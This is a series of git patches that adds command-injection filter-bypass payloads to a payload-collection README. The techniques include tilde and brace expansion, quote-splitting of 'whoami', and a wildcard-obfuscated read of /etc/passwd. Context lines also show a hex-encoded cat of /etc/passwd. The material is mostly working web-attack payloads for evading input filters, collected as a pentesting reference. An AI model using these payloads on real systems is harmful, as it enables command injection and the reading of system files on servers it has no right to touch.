From 1a475b6e1d8ba0549d0176d8cabd436c897bd659 Mon Sep 17 00:00:00 2001
From: Xhoenix <86168235+Xhoenix@users.noreply.github.com>
Date: Mon, 15 Jul 2024 11:58:02 +0530
Subject: [PATCH 1/4] added bypass techniques
---
 Command Injection/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index d0ce9cd..1a2df3b 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -15,6 +15,8 @@
 * [Bypass with a line return](#bypass-with-a-line-return)
 * [Bypass with backslash newline](#bypass-with-backslash-newline)
 * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
+ * [Bypass with Tilde expansion](#bypass-with-tilde-expansion)
+ * [Bypass characters filter](#bypass-characters-filter)
 * [Bypass blacklisted words](#bypass-blacklisted-words)
 * [Bypass with single quote](#bypass-with-single-quote)
 * [Bypass with double quote](#bypass-with-double-quote)
@@ -217,6 +219,12 @@ swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 root:x:0:0:root:/root:/bin/bash
 ```
+### Bypass with Tilde expansion
+
+```powershell
+echo ~+
+echo ~-
+```
 ### Bypass characters filter
From 80707e805b3ba98fef29e103c896287986fc2116 Mon Sep 17 00:00:00 2001
From: Xhoenix <86168235+Xhoenix@users.noreply.github.com>
Date: Thu, 25 Jul 2024 11:57:43 +0530
Subject: [PATCH 2/4] added bypass techniques
---
 Command Injection/README.md | 11 +++++++++++
 1 file changed, 11 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 1a2df3b..08026da 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -16,6 +16,7 @@
 * [Bypass with backslash newline](#bypass-with-backslash-newline)
 * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
 * [Bypass with Tilde expansion](#bypass-with-tilde-expansion)
+ * [Bypass with Brace expansion](#bypass-with-brace-expansion)
 * [Bypass characters filter](#bypass-characters-filter)
 * [Bypass blacklisted words](#bypass-blacklisted-words)
 * [Bypass with single quote](#bypass-with-single-quote)
@@ -226,6 +227,16 @@ echo ~+
 echo ~-
 ```
+### Bypass with Brace expansion
+
+```powershell
+{,ip,a}
+{,ifconfig}
+{,ifconfig,eth0}
+{l,-lh}s
+```
+
+
 ### Bypass characters filter
 Commands execution without backslash and slash - linux bash
From 77f83c18b35b2f5c4462058d2a8f2ab187c85deb Mon Sep 17 00:00:00 2001
From: Xhoenix <86168235+Xhoenix@users.noreply.github.com>
Date: Fri, 6 Sep 2024 19:09:46 +0530
Subject: [PATCH 3/4] update quote evasion payloads
---
 Command Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 08026da..015c623 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash
 ```powershell
 w'h'o'am'i
 wh''oami
+'w'hoami
 ```
 #### Bypass with double quote
@@ -273,6 +274,7 @@ wh''oami
 ```powershell
 w"h"o"am"i
 wh""oami
+"wh"oami
 ```
 #### Bypass with backticks
From 04eb1eb12d847fdd0e22b38d2b145d8163fcb92e Mon Sep 17 00:00:00 2001
From: Xhoenix <86168235+Xhoenix@users.noreply.github.com>
Date: Tue, 17 Sep 2024 22:29:37 +0530
Subject: [PATCH 4/4] Update README.md
added more payloads
---
 Command Injection/README.md | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 015c623..fbbaf51 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -234,6 +234,9 @@ echo ~-
 {,ifconfig}
 {,ifconfig,eth0}
 {l,-lh}s
+{,echo,#test}
+{,$"whoami",}
+{,/?s?/?i?/c?t,/e??/p??s??,}
 ```